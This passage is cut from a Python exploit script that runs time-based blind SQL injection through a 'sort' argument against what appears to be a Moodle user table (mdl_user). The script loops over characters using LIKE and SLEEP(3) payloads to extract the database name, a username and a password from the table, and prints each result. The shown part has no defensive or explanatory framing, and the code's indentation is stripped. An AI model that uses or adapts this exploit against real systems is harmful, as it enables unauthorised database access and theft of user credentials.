result = ""
for _ in range(50): # Assumes a maximum of 50 characters for the value
character_found = False
for character in characters_to_test:
if column == "database()":
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
else:
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
if test_character(base_payload):
result += character
print(colored(f"{label}: {result}", 'red'), end="\r")
character_found = True
break
if not character_found:
break
# Print the final result
print(colored(f"{label}: {result}", 'red'))
if __name__ == "__main__":
extract_value("database()", "Database")
extract_value("username", "Username")
extract_value("password", "Password")